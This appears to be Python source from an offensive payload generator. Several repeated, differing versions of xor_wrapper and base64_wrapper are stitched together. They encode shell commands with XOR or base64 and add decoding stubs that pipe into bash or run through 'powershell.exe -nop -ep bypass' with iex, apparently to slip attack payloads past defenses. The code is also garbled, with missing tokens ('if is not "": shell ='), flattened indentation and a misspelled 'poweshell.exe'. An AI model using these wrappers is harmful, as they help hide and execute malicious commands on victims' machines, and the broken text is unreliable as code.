def xor_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if "powershell" not in name.lower(): if "windows" not in name.lower(): code = """VAR1="";for VAR2 in $(echo {0}|sed "s/../&\\n/g"); do VAR1=$VAR1$(echo -e $(awk "BEGIN {{printf \\"%x\\n\\", xor(0x$VAR2, {1})}}"|sed "s/../\\\\\\\\x&/g"));done;echo $VAR1|{2}""".format( hexlify(xor(code, args.xor)), hex(args.xor), shell) code = shell + " -c '" + code + "'" code = randomize_vars(code, args.obfuscate_small) else: # Improved code in 0.3.6 if "-Command" in code: prefix, xcode = code.split("-Command") else: prefix = "powershell.exe -nop -ep bypass " xcode = code pcode = xcode.replace('"', "") #pcode = pcode.replace("\\", '\\"') code = to_unicode(pcode) # String to Unicode code = xor(code, args.xor) # XOR encode using random key <-- code = powershell_base64(code, unicode_encoding=False ) # We need it in base64 because it is binary code = """ $VAR1={0};$VAR2='{1}';$VAR3=[Convert]::FromBase64String($VAR2);$VAR4=foreach($VAR5 in $VAR3) {{$VAR5 -bxor $VAR1}};$VAR7=[System.Text.Encoding]::Unicode.GetString($VAR4);iex $VAR7""".format( args.xor, code) # Decryption stub code = prefix + "-Command " + '"%s"' % code code = randomize_vars(code, args.obfuscate_small) return code
def base64_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if args.base64 is True: if "powershell" not in name.lower( ): # post-note: linux powershell is going to have problem. if "windows" not in name.lower(): code = "echo " + code.encode("base64").replace( "\n", "") + "|base64 -d|{0}".format(shell) else: # Powershell encoding code # Improved code in 0.3.6 if "-command" in code.lower(): prefix, xcode = str(code.lower()).split( "-command" ) if args.powershell_random_case is True else code.split( "-Command") else: prefix = "powershell.exe -nop -ep bypass " xcode = code pcode = xcode.replace('"', "") # Remove double quotes from -Command #pcode = pcode.replace("\\", "") # remove string quotation # It is needed to random case again, if the user chose to random-case. pcode = powershell_wrapper(name, pcode, args) code = prefix + "-Encoded " + powershell_base64(pcode[1:]) return code
def xor_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if "powershell" not in name.lower(): if "windows" not in name.lower(): code = """s="";for x in $(echo {0}|sed "s/../&\\n/g"); do s=$s$(echo -e $(awk "BEGIN {{printf \\"%x\\n\\", xor(0x$x, {1})}}"|sed "s/../\\\\\\\\x&/g"));done;echo $s|{2}""".format( hexlify(xor(code, args.xor)), hex(args.xor), shell) code = shell + " -c '" + code + "'" else: # Improved code in 0.3.6 if "-Command" in code: prefix, xcode = code.split("-Command") else: prefix = "poweshell.exe -nop -ep bypass " xcode = code pcode = xcode.replace("'", "") pcode = pcode.replace("\\", "") code = to_unicode(pcode) # String to Unicode code = xor(code, args.xor) # XOR encode using random key <-- code = powershell_base64(code, unicode_encoding=False ) # We need it in base64 because it is binary code = """$k={0};$b=\\"{1}\\";$d=[Convert]::FromBase64String($b);$dd=foreach($byte in $d) {{$byte -bxor $k}};$dm=[System.Text.Encoding]::Unicode.GetString($dd);iex $dm""".format( args.xor, code) # Decryption stub code = prefix + "-Command " + "'%s'" % code return code
def base64_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if args.base64 is True: if "powershell" not in name.lower( ): # post-note: linux powershell is going to have problem. if "windows" not in name.lower(): code = "echo " + code.encode("base64").replace( "\n", "") + "|base64 -d|{0}".format(shell) else: # Powershell encoding code prefix, xcode = code.split("-Command") pcode = xcode.replace("'", "") # Remove single quotes from -Command pcode = pcode.replace("\\", "") # remove string quotation code = prefix + "-Encoded " + powershell_base64(pcode) return code
def xor_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if "powershell" not in name.lower(): if "windows" not in name.lower(): code = """s="";for x in $(echo {0}|sed "s/../&\\n/g"); do s=$s$(echo -e $(awk "BEGIN {{printf \\"%x\\n\\", xor(0x$x, {1})}}"|sed "s/../\\\\\\\\x&/g"));done;echo $s|{2}""".format(hexlify(xor(code, args.xor)), hex(args.xor), shell) code = shell + " -c '" + code + "'" else: # Improved code in 0.3.6 if "-Command" in code: prefix, xcode = code.split("-Command") else: prefix = "powershell.exe -nop -ep bypass " xcode = code pcode = xcode.replace('"', "") #pcode = pcode.replace("\\", '\\"') code = to_unicode(pcode) # String to Unicode code = xor(code, args.xor) # XOR encode using random key <-- code = powershell_base64(code, unicode_encoding=False) # We need it in base64 because it is binary code = """ $k={0};$b='{1}';$d=[Convert]::FromBase64String($b);$dd=foreach($byte in $d) {{$byte -bxor $k}};$dm=[System.Text.Encoding]::Unicode.GetString($dd);iex $dm""".format(args.xor, code) # Decryption stub code = prefix + "-Command " + '"%s"' % code return code
def base64_wrapper(name, code, args, shell="/bin/bash"): if is not "": shell = if args.base64 is True: if "powershell" not in name.lower(): # post-note: linux powershell is going to have problem. if "windows" not in name.lower(): code = "echo " + code.encode("base64").replace("\n", "") + "|base64 -d|{0}".format(shell) else: # Powershell encoding code # Improved code in 0.3.6 if "-command" in code.lower(): prefix, xcode = str(code.lower()).split("-command") if args.powershell_random_case is True else code.split("-Command") else: prefix = "powershell.exe -nop -ep bypass " xcode = code pcode = xcode.replace('"', "") # Remove double quotes from -Command #pcode = pcode.replace("\\", "") # remove string quotation # It is needed to random case again, if the user chose to random-case. pcode = powershell_wrapper(name, pcode, args) code = prefix + "-Encoded " + powershell_base64(pcode[1:]) return code